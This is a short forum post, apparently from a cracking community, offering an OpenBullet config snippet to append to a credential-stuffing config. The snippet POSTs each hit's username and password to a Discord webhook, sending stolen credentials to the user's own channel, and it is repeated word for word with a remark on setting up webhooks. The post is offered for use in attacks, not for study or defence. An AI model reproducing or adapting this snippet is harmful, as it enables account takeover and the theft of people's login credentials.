stefans
Social Butterfly
LEVEL 1
300 XP
Paste This to the end of file and if your openbullet config is set to <USER>:<PASS> DONT FORGET TO CHANGE.
REQUEST POST "https://discordapp.com/api/webhooks/YOURWEBHOOK
CONTENT "{\"content\":\"<USERNAME>:<PASSWORD>\"}"
CONTENTTYPE "application/json"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
How to create webhook for this? Google there are millions of tuts takes 5 sec to create
REQUEST POST "https://discordapp.com/api/webhooks/YOURWEBHOOK
CONTENT "{\"content\":\"<USERNAME>:<PASSWORD>\"}"
CONTENTTYPE "application/json"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
How to create webhook for this? Google there are millions of tuts takes 5 sec to create